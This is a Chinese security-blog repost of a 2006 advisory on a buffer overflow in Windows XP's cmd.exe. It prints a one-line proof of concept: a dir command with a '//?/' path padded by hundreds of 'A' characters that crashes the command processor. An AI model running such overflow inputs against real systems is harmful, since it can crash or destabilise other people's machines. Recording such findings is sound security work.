真正的dir溢出 's

admin 2017年4月18日23:23:19评论304 views字数 652阅读2分10秒阅读模式
摘要

刚在CN.Tink那里看到的,哈哈,挺好玩的!
我试了下,截图如下:

Windows Command Processor CMD.EXE Buffer Overflow

刚在CN.Tink那里看到的,哈哈,挺好玩的!
我试了下,截图如下:
真正的dir溢出  's
Windows Command Processor CMD.EXE Buffer Overflow

Execute the following line in cmd.exe (copy-paste)..
tested on winxp sp2 (fully patched) on 2006/10/06/17.56

(it is a single command, has been split into multiple lines for readability sake).
%COMSPEC% /K "dir //?/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

直接输入dir //?/AAA(超过260个A)也会引发错误
来自国外一个站,原文:http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月18日23:23:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   真正的dir溢出 'shttps://cn-sec.com/archives/48918.html

发表评论

匿名网友 填写信息